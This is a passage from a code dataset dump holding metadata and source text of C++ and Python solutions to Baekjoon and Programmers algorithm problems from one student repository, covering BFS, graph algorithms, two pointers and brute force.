; i++) {\n cin >> x >> y >> z;\n ground[x][y].push_back(z);\n }\n\n while(k--){\n spring();\n summer();\n autumn();\n winter();\n }\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++){\n ans += ground[i][j].size();\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.41727495193481445, "alphanum_fraction": 0.44525548815727234, "avg_line_length": 21.243244171142578, "blob_id": "bae58b6577a56766061f5ef08d8771a4cc5f7dcb", "content_id": "0102faa7e14be304fa27a90aa0ef0efe17b4a860", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 69, "num_lines": 37, "path": "/BOJ/Implementation/9935.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9935번: 문자열 폭발\nDATE: 2021-03-22\n*/\n#include <iostream>\n#include <string>\nusing namespace std;\n\n int main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str, bomb, ans=\"\";\n int cnt=0;\n cin >> str >> bomb;\n\n for(int i = 0 ; i < str.length() ; i++){\n ans += str[i];\n if(str[i] == 
bomb[bomb.length()-1]){\n            int ansIdx = ans.length()-1;\n            int bombIdx = bomb.length()-1;\n\n            for(int j = bomb.length() ; j > 0 ; j--){\n                if(ans[ansIdx--] == bomb[bombIdx--]) cnt++;\n            }\n            \n            if(cnt == bomb.length()){\n                ans.erase(ans.length()-bomb.length(), bomb.length());\n            }\n\n            cnt = 0;\n        }\n    }\n\n    if(ans == \"\") cout << \"FRULA\";\n    else cout << ans;\n\n    return 0;\n }" }, { "alpha_fraction": 0.3503575026988983, "alphanum_fraction": 0.3901940882205963, "avg_line_length": 21.272727966308594, "blob_id": "758f6c32de9577bfc88cf4d9778ebd0760d414e3", "content_id": "d0abd6fa105465b8aa335158ce5606130cc44452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 60, "num_lines": 44, "path": "/BOJ/Graph Theory/11404.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11404번: 플로이드\nDATE: 2021-04-12\nUPDATE: 2022-03-04\nFloyd-Warshall Algorithm\n*/\n#include <iostream>\n#include <algorithm>\n#define INF 1e9\nusing namespace std;\n\nint main(){\n    ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n    int n, m;\n    cin >> n >> m;\n\n    int arr[n+1][n+1];\n    fill(&arr[0][0], &arr[n][n + 1], INF);\n\n    for(int i = 0 ; i < m ; i++){\n        int a, b, c;\n        cin >> a >> b >> c;\n        arr[a][b] = min(arr[a][b], c);\n    }\n\n    for(int k = 1 ; k <= n ; k++){ //거쳐가는 노드\n        for(int i = 1 ; i <= n ; i++){ //출발 노드\n            for(int j = 1 ; j <= n ; j++){ //도착 노드\n                if(arr[i][k] + arr[k][j] < arr[i][j])\n                    arr[i][j] = arr[i][k] + arr[k][j];\n            }\n        }\n    }\n\n    for(int i = 1 ; i <= n ; i++){\n        for(int j = 1 ; j <= n ; j++){\n            if(i == j || arr[i][j] == INF) cout << 0 << \" \";\n            else cout << arr[i][j] << \" \";\n        }\n        cout << \"\\n\";\n    }\n\n    return 0;\n}" }, { "alpha_fraction": 0.4372217357158661, "alphanum_fraction": 0.4785992205142975, "avg_line_length": 12.20512866973877, "blob_id": "c2a5f56e5db2e66c9d23c61865361a447fc7e814", "content_id": "917b8b7c0478120aa44eabb7c90c95c892ea4b1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 522, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Brute Force/2231.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2231번: 분해합\n2021-05-18\nBrute Force\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 1000001\nusing namespace std;\n\nint f(int num){\n    int sum = num;\n\n    while (num != 0) {\n\t\tsum += num % 10;\n\t\tnum = num / 10;\n\t}\n\n\treturn sum;\n}\n\nint main(){\n    ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n    int n;\n    cin >> n;\n\n    for(int i = 1 ; i < n ; i++){\n        int num = f(i);\n\n        if(num == n){\n            cout << i;\n            return 0;\n        }\n    }\n\n    cout << 0;\n\n    return 0;\n}" }, { "alpha_fraction": 0.3429228961467743, "alphanum_fraction": 0.39355581998825073, "avg_line_length": 16.399999618530273, "blob_id": "40015985d17543c0d964fba9c8f884f0cd5309d6", "content_id": "8925d587c897b045e39d80cb17d29be089b10a39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 879, "license_type": "no_license", "max_line_length": 60, "num_lines": 50, "path": "/BOJ/BFS_DFS/1697.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 1697번: 숨바꼭질\nDATE: 2021-01-20\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 100001\n\nusing namespace std;\n\nint sec[MAX] = { 0, };\n\nint main() {\n    ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n    int n, k, ans;\n    int move[] 
= { -1, 1, 2 };\n queue <int> q;\n\n cin >> n >> k;\n\n sec[n] = 1;\n q.push(n);\n\n while (!q.empty()) {\n int cur = q.front();\n q.pop();\n\n if (cur == k) {\n cout << sec[cur] - 1;\n break;\n }\n\n int next;\n for (int i = 0; i < 3; i++) {\n if (i == 0 || i == 1)\n next = cur + move[i];\n else\n next = cur * move[i];\n\n if (next >= 0 && next <= 100000 && !sec[next]) {\n q.push(next);\n sec[next] = sec[cur] + 1;\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3130003809928894, "alphanum_fraction": 0.3492184579372406, "avg_line_length": 23.754716873168945, "blob_id": "0a948012662371fe3ffef19bca81e36741803039", "content_id": "c33aff34613b517b7459048f73a92c1824558f1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2653, "license_type": "no_license", "max_line_length": 99, "num_lines": 106, "path": "/BOJ/Implementation/21610.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 21610번: 마법사 상어와 비바라기\nDATE: 2022-03-14\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint n, m, ans;\nint arr[51][51];\nvector<pair<int,int>> cloud, mv_cloud;\nint dr[8] = {0, -1, -1, -1, 0, 1, 1, 1};\nint dc[8] = {-1, -1, 0, 1, 1, 1, 0, -1};\nint diagonalR[4] = {-1, -1, 1, 1};\nint diagonalC[4] = {-1, 1, 1, -1};\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int d, s;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> arr[i][j];\n }\n }\n\n cloud.push_back({n - 1, 1});\n cloud.push_back({n - 1, 2});\n cloud.push_back({n, 1});\n cloud.push_back({n, 2});\n\n for(int i = 0 ; i < m ; i++){\n cin >> d >> s;\n\n for(int j = 0 ; j < cloud.size() ; j++){ // 1번\n int r = cloud[j].first;\n int c = cloud[j].second;\n int nr, nc;\n\n for(int k = 0 ; k < s ; k++){\n if(r == 1 && r + dr[d - 1] == 0) nr = n;\n else if(r == n && r + dr[d - 1] == n + 1) nr = 1;\n else nr = r + dr[d - 1];\n\n if(c == 1 && c + dc[d - 1] == 0) nc = n;\n else if(c == n && c + dc[d - 1] == n + 1) nc = 1;\n else nc = c + dc[d - 1];\n\n r = nr;\n c = nc;\n }\n\n mv_cloud.push_back({r, c});\n }\n\n // 2번\n for(int j = 0 ; j < mv_cloud.size() ; j++) arr[mv_cloud[j].first][mv_cloud[j].second] += 1;\n\n // 4번\n for(int j = 0 ; j < mv_cloud.size() ; j++){\n int r = mv_cloud[j].first;\n int c = mv_cloud[j].second;\n int cnt = 0;\n\n for(int k = 0 ; k < 4 ; k++){\n int nr = r + diagonalR[k];\n int nc = c + diagonalC[k];\n\n if(nr == 0 || nc == 0 || nr == n + 1 || nc == n + 1) continue;\n if(arr[nr][nc] > 0) cnt++;\n }\n\n arr[r][c] += cnt;\n }\n\n cloud.clear();\n\n // 5번\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(arr[i][j] > 1) {\n pair<int,int> p = {i, j};\n\n if(find(mv_cloud.begin(), mv_cloud.end(), p) == mv_cloud.end()){\n cloud.push_back({i, j});\n arr[i][j] -= 2;\n }\n }\n }\n }\n\n mv_cloud.clear();\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n ans += arr[i][j];\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4146501123905182, "alphanum_fraction": 0.43100064992904663, "avg_line_length": 18.615385055541992, "blob_id": "6a7b471e06f22d2b05e600c4b097750e3c5dbb10", "content_id": "fed979febba4d8acaf2baf6c1ab21c1bf91d194f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1537, "license_type": "no_license", "max_line_length": 70, "num_lines": 78, "path": "/BOJ/Graph Theory/14725.cpp", "repo_name": "yegyeom/Algorithm", 
"src_encoding": "UTF-8", "text": "/*\nBOJ 14725번: 개미굴\nDATE: 2021-07-05\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nstruct Node{\n string food;\n vector<Node> children;\n};\n\nNode head;\nNode* cur;\n\nbool cmp(Node a, Node b){\n return a.food < b.food;\n}\n\nbool check(string str){\n for(int k = 0 ; k < cur->children.size() ; k++){\n if(cur->children[k].food == str){\n cur = &(cur->children[k]);\n return true;\n }\n }\n\n return false;\n}\n\nvoid print(Node node, int depth){\n if(node.food != \"\"){\n for(int i = 0 ; i < depth ; i++){\n cout << \"--\";\n }\n cout << node.food << '\\n';\n }\n\n for(int i = 0 ; i < node.children.size() ; i++){\n print(node.children[i], depth+1);\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n int n, k;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n int k;\n cin >> k;\n \n cur = &head;\n\n for(int j = 0 ; j < k ; j++){\n cin >> str;\n if(!check(str)){\n Node node;\n node.food = str;\n cur->children.push_back(node);\n\n sort(cur->children.begin(), cur->children.end(), cmp);\n for(int k = 0 ; k < cur->children.size() ; k++){\n if(cur->children[k].food == str){\n cur = &cur->children[k];\n }\n }\n }\n }\n }\n \n print(head, -1);\n\n return 0;\n}" }, { "alpha_fraction": 0.41980475187301636, "alphanum_fraction": 0.4686192572116852, "avg_line_length": 16.095237731933594, "blob_id": "ad13ca81378801cdf6f273ee6465746a0423d379", "content_id": "4ee4322defebac5fdea8f0e5e0d5b5ffdd63912b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 731, "license_type": "no_license", "max_line_length": 58, "num_lines": 42, "path": "/BOJ/Two Pointer/14921.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14921번: 용액 합성하기\nDATE: 2022-01-17\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v, ans(2);\n int n, num;\n int start, end, min;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> num;\n v.push_back(num);\n }\n\n start = 0; end = n - 1;\n min = 100000001;\n\n while(start < end){\n int sum = v[start] + v[end];\n\n if(abs(sum) < min){\n ans[0] = v[start];\n ans[1] = v[end];\n min = abs(sum);\n }\n\n if(sum < 0) start++;\n else end--;\n }\n\n cout << ans[0] + ans[1];\n\n return 0;\n}" }, { "alpha_fraction": 0.37403401732444763, "alphanum_fraction": 0.41112828254699707, "avg_line_length": 18.636363983154297, "blob_id": "bfe6e8ab81d38a0e07137e59f3fed4e21fa7f9ac", "content_id": "e2593633bc67853e87597cca46f6329cd55dda7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 655, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Brute Force/2798.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2798번: 블랙잭\n2021-05-18\nBrute Force\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, sum, maximum = -1;\n cin >> n >> m;\n\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) cin >> arr[i];\n\n for(int i = 0 ; i < n-2 ; i++){\n for(int j = i + 1 ; j < n-1 ; j++){\n for(int k = j + 1 ; k < n ; k++){\n sum = arr[i] + arr[j] + arr[k];\n if(sum <= m && sum > 0){\n maximum = max(sum, maximum);\n }\n }\n }\n }\n\n cout << maximum;\n\n return 0;\n}" }, { "alpha_fraction": 
0.3739902973175049, "alphanum_fraction": 0.394991934299469, "avg_line_length": 20, "blob_id": "d8572b8701de9f9cb0ca9c84789f47cc084cb925", "content_id": "7bede70cfdd65867c982b9c319c87b812134155a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1314, "license_type": "no_license", "max_line_length": 73, "num_lines": 59, "path": "/BOJ/Implementation/1039.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1039번: 교환\nDATE: 2021-10-16\n*/\n#include <iostream>\n#include <queue>\n#include <set>\nusing namespace std;\n\nvoid swap(string &str, int left, int right){\n char tmp = str[left];\n str[left] = str[right];\n str[right] = tmp;\n}\n\nint main(){\n queue<string> q;\n int n, k, ans = -1;\n cin >> n >> k;\n\n q.push(to_string(n));\n\n for(int i = 0 ; i < k ; i++){ \n set<string> s; \n int qsz = q.size();\n\n for(int j = 0 ; j < qsz ; j++){\n string cur = q.front();\n q.pop();\n\n if(s.count(cur) > 0) continue; //set에 존재하면 패스 (중복 제거) \n else(s.insert(cur));\n\n for(int s = 0 ; s < cur.length() ; s++){ //left\n for(int e = s + 1 ; e < cur.length() ; e++){ //right\n if(!(s == 0 && cur[e] == '0')){ //바꾼 수가 0으로 시작하면 안되므로\n swap(cur, s, e);\n q.push(cur);\n swap(cur, s, e); // 원래대로\n }\n }\n }\n }\n }\n\n while(!q.empty()){\n int num = stoi(q.front());\n ans = max(ans, num);\n q.pop();\n }\n\n if(ans < 10) //0으로 시작할 때\n cout << -1;\n else\n cout << ans;\n\n return 0;\n \n}" }, { "alpha_fraction": 0.4372217357158661, "alphanum_fraction": 0.4772929549217224, "avg_line_length": 19.071428298950195, "blob_id": "8433145fa7ab3fd9a1dca9a017c975ba59f03fb1", "content_id": "3e1d67e58867dca70becbb7e29e9e0c53121329a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1131, "license_type": "no_license", "max_line_length": 59, "num_lines": 56, "path": "/BOJ/Brute Force/2529.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2529번: 부등호\nDATE: 2021-03-04\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 10\nusing namespace std;\n\nint k;\nint num[MAX] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9};\nvector <int> maxNum, minNum;\nchar arr[9];\n\nint check(vector<int> &v){\n for(int i = 0 ; i < k ; i++){\n if(arr[i] == '<' && v[i] > v[i+1]) return 1;\n else if(arr[i] == '>' && v[i] < v[i+1]) return 1;\n }\n return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> k;\n\n for(int i = 0 ; i < k ; i++) cin >> arr[i];\n\n//max\n for(int i = 9 ; i >= 9-k ; i--) maxNum.push_back(i);\n\n while(1){\n if(check(maxNum)){\n prev_permutation(maxNum.begin(), maxNum.end());\n }\n else break;\n }\n\n//min\n for(int i = 0 ; i <= k ; i++) minNum.push_back(i);\n\n while(1){\n if(check(minNum)){\n next_permutation(minNum.begin(), minNum.end());\n }\n else break;\n }\n\n for(int i = 0 ; i < k+1 ; i++) cout << maxNum[i];\n cout << '\\n';\n for(int i = 0 ; i < k+1 ; i++) cout << minNum[i];\n cout << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.4058624505996704, "alphanum_fraction": 0.4239007830619812, "avg_line_length": 23, "blob_id": "df1af5f747b698754efb0ad21ec1a2944ae9086c", "content_id": "0cecfd062e065627474828afaa00cc00aeccdb76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 897, "license_type": "no_license", "max_line_length": 73, "num_lines": 37, "path": "/programmers/Level 2/string_compression.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", 
"text": "/*\nprogrammers level 2: 문자열 압축\ndate: 2022-04-11\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint solution(string s) {\n int minVal = s.length(); \n \n for(int i = 1 ; i <= s.length() / 2 ; i++){\n string left, res;\n int cnt = 0;\n \n for(int j = 0 ; j <= s.length() ; j += i){\n string right = s.substr(j, i);\n \n if(left == right) cnt++;\n else if(cnt > 0){\n string tmp = to_string(cnt + 1) + left;\n right.length() >= i ? res += tmp : res += tmp + right;\n \n cnt = 0;\n } \n else right.length() == i ? res += left : res += left + right;\n \n left = right;\n }\n \n int leng = res.length();\n minVal = min(minVal, leng);\n }\n \n return minVal;\n}" }, { "alpha_fraction": 0.4382871389389038, "alphanum_fraction": 0.4609571695327759, "avg_line_length": 20.672727584838867, "blob_id": "6e55b08ffd8714e647e85acbb9c6eb7b5f9f4d78", "content_id": "d807be0990b8011a865dbe2b8f9a715f0b420679", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 66, "num_lines": 55, "path": "/BOJ/Two Pointer/2831.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2831번: 댄스 파티\nDATE: 2022-02-10\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> posM, negM, posW, negW;\n int n, height;\n int a, b, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n * 2 ; i++) {\n cin >> height;\n\n if(height < 0 && i < n) negM.push_back(abs(height));\n else if(height > 0 && i < n) posM.push_back(height);\n else if(height < 0 && i >= n) negW.push_back(abs(height));\n else if(height > 0 && i >= n) posW.push_back(height);\n }\n\n sort(negM.begin(), negM.end());\n sort(posM.begin(), posM.end());\n sort(negW.begin(), negW.end());\n sort(posW.begin(), posW.end());\n\n // 남자 양수 - 여자 음수\n a = 0; b = 0;\n while(a < posM.size() && b < negW.size()) {\n if(posM[a] < negW[b]) {\n ans++;\n a++; b++;\n }\n else b++;\n }\n\n // 남자 음수 - 여자 양수\n a = 0; b = 0;\n while(a < negM.size() && b < posW.size()) {\n if(negM[a] > posW[b]) {\n ans++;\n a++; b++;\n }\n else a++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.5106732249259949, "alphanum_fraction": 0.5418719053268433, "avg_line_length": 18.677419662475586, "blob_id": "d94b84ee17db37425fdeb9378c7970e5a473f854", "content_id": "c6f8ca30e3adc942e0b522c89d90694a3579a29d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 621, "license_type": "no_license", "max_line_length": 86, "num_lines": 31, "path": "/BOJ/Implementation/10814.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10814번: 나이순 정렬\n2022-01-15\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nbool cmp(pair<int,string> a, pair<int,string> b) {\n return a.first < b.first;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<pair<int,string>> vec;\n int n, age;\n string name;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> age >> name;\n vec.push_back({age, name});\n }\n\n stable_sort(vec.begin(), vec.end(), cmp);\n\n for(int i = 0 ; i < n ; i++) cout << vec[i].first << \" \" << vec[i].second << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.3915243446826935, "alphanum_fraction": 0.4218848943710327, "avg_line_length": 20.671232223510742, "blob_id": 
"82c3d12629a336f3d8d876c9200c812127b318c4", "content_id": "b11da7b506f72d5da3796f59b113816bf98b728b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1643, "license_type": "no_license", "max_line_length": 103, "num_lines": 73, "path": "/programmers/Level 2/check_the_distance.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 거리두기 확인하기\n2021-10-26\n2021 카카오 채용연계형 인턴십\n*/\n#include <string>\n#include <vector>\n#include <iostream>\n#include <string.h>\nusing namespace std;\n\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nbool visited[5][5];\nbool flag;\nvector<string> place;\n\nvoid dfs(int x, int y, int depth) {\n if(depth > 2) { \n return;\n }\n \n visited[x][y] = true;\n \n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= 5 || ny >= 5 || visited[nx][ny] || place[nx][ny] == 'X') continue;\n if(place[nx][ny] == 'P' && depth < 2) { // 거리 2 이하에 사람 있으면 안됨\n flag = false;\n return;\n }\n dfs(nx, ny, depth + 1);\n }\n}\n\nbool func() {\n for(int i = 0 ; i < 5 ; i++) {\n for(int j = 0 ; j < 5 ; j++) {\n if(place[i][j] == 'P') {\n flag = true;\n memset(visited, false, sizeof(visited));\n dfs(i, j, 0);\n if(!flag) return false;\n }\n }\n }\n \n return true;\n}\n\nvector<int> solution(vector<vector<string>> places) {\n vector<int> answer;\n string str;\n \n for(int i = 0 ; i < 5 ; i++) {\n place.clear();\n \n for(int j = 0 ; j < 5 ; j++) {\n for(int k = 0 ; k < 5 ; k++) {\n str += places[i][j][k];\n }\n place.push_back(str);\n str.clear();\n }\n \n if(!func()) answer.push_back(0);\n else answer.push_back(1);\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.45128780603408813, "alphanum_fraction": 0.4916013479232788, "avg_line_length": 21.923076629638672, "blob_id": "21ae3ac2740fee9b86be85339bd034295d2762cc", "content_id": "27a5893afd88f802ff47aaee00f8d4810611259b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 959, "license_type": "no_license", "max_line_length": 95, "num_lines": 39, "path": "/BOJ/Prefix Sum/14476.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14476번: 최대공약수 하나 빼기\nDATE: 2022-01-24\nPrefix Sum\n*/\n#include <iostream>\n#define MAX 1000001\nusing namespace std;\n\nlong long arr[MAX], leftArr[MAX], rightArr[MAX];\n\nlong long gcd(long long a, long long b){\n return b ? 
gcd(b, a % b) : a;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n int max = -1, idx;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++) cin >> arr[i];\n for(int i = 1 ; i <= n ; i++) leftArr[i] = gcd(arr[i], leftArr[i - 1]); // 왼쪽부터 최대공약수 누적\n for(int i = n ; i >= 1 ; i--) rightArr[i] = gcd(arr[i], rightArr[i + 1]); // 오른쪽부터 최대공약수 누적\n\n for(int i = 1 ; i <= n ; i++){\n num = gcd(leftArr[i - 1], rightArr[i + 1]);\n\n if(num > max && arr[i] % num != 0) {\n max = num;\n idx = i;\n }\n }\n\n if(max == -1) cout << -1;\n else cout << max << \" \" << arr[idx];\n\n return 0;\n}" }, { "alpha_fraction": 0.4491434693336487, "alphanum_fraction": 0.4657387435436249, "avg_line_length": 20.482759475708008, "blob_id": "337c983f28736bfffefc100626dfbb5240183770", "content_id": "d45bf5fe8713bd27e2c982853d6129e9add30285", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1956, "license_type": "no_license", "max_line_length": 86, "num_lines": 87, "path": "/BOJ/Graph Theory/1043.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1043번: 거짓말\n2021-12-26\nUnion-Find\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint getParent(int parent[], int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b) {\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b) {\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> truth, tmp;\n vector<vector<int>> party;\n int n, m, truthNum; //사람 수, 파티 수, 진실을 아는 사람의 수\n int total, num, ans = 0;\n bool flag;\n cin >> n >> m >> truthNum;\n\n if(truthNum == 0) { // 진실을 아는 사람이 한 명도 없을 때\n cout << m;\n return 0;\n }\n\n int parent[n + 1];\n\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < truthNum ; i++) {\n cin >> num;\n truth.push_back(num); // 진실을 아는 사람들의 번호\n }\n\n for(int i = 0 ; i < m ; i++) {\n cin >> total;\n\n for(int j = 0 ; j < total ; j++) {\n cin >> num;\n tmp.push_back(num);\n }\n\n party.push_back(tmp);\n \n for(int j = 1 ; j < tmp.size() ; j++) unionParent(parent, tmp[j - 1], tmp[j]);\n\n tmp.clear();\n }\n\n for(int i = 0 ; i < party.size() ; i++) {\n flag = true;\n\n for(int j = 0 ; j < party[i].size() ; j++) {\n for(int k = 0 ; k < truth.size() ; k++) {\n if(findParent(parent, party[i][j], truth[k])){\n flag = false;\n break;\n }\n if(!flag) break;\n }\n }\n\n if(flag) ans++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4567541182041168, "alphanum_fraction": 0.4839650094509125, "avg_line_length": 19.19607925415039, "blob_id": "e46ae713f119c624538d165e2db696f133d087d9", "content_id": "34f3b43c2f55df0b0d1333c8cd336b4854f6a4fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1057, "license_type": "no_license", "max_line_length": 71, "num_lines": 51, "path": "/BOJ/BFS_DFS/5014.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5014번: 스타트링크\nDATE: 2022-04-28\nBFS\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint F, S, G, U, D;\nbool visited[1000001];\n\nvoid bfs(int S){\n queue<pair<int,int>> q;\n q.push({S, 0});\n visited[S] = true;\n \n 
while(!q.empty()){\n int floor = q.front().first;\n int cnt = q.front().second;\n q.pop();\n\n if(floor == G) {\n cout << cnt;\n return;\n }\n\n int upstairs = floor + U;\n int downstairs = floor - D;\n\n if(upstairs > 0 && upstairs <= F && !visited[upstairs]) {\n q.push({upstairs, cnt + 1});\n visited[upstairs] = true;\n }\n if(downstairs > 0 && downstairs <= F && !visited[downstairs]) {\n q.push({downstairs, cnt + 1});\n visited[downstairs] = true;\n }\n }\n\n cout << \"use the stairs\";\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> F >> S >> G >> U >> D; // 총 F층, 현재 층, 도착 층, Up, Down\n\n bfs(S);\n\n return 0;\n}" }, { "alpha_fraction": 0.5967742204666138, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 18.153846740722656, "blob_id": "d9d033352c76bfb5e6c366ae545b041243f88861", "content_id": "fce5c9caa4be0ea8aca041138ec3e0155482ca80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/programmers/Level 1/pick_two_and_add.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 두 개 뽑아서 더하기\n# date: 2022-04-14\nimport itertools\n\ndef solution(numbers):\n answer = []\n\n for i in itertools.combinations(numbers, 2):\n answer.append(i[0] + i[1])\n\n answer = sorted(set(answer))\n\n return answer" }, { "alpha_fraction": 0.4154103994369507, "alphanum_fraction": 0.47236180305480957, "avg_line_length": 18.933332443237305, "blob_id": "e93242cbcc880cb791a3871be2e5f1ca3e0acac5", "content_id": "4d8d3e5d7149be1998cd0fbf4ed60c3523950181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 603, "license_type": "no_license", "max_line_length": 60, "num_lines": 30, "path": "/programmers/Level 1/gym_clothes.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 체육복\ndate: 2021-04-28\nupdate: 2022-04-28\n*/\n#include <string>\n#include <vector>\nusing namespace std;\n\nint arr[31];\n\nint solution(int n, vector<int> lost, vector<int> reserve) {\n int answer = 0;\n \n for(auto i : lost) arr[i] -= 1;\n for(auto i : reserve) arr[i] += 1;\n \n for(int i = 1 ; i < n ; i++){\n if(arr[i] == -1){\n if(arr[i-1] 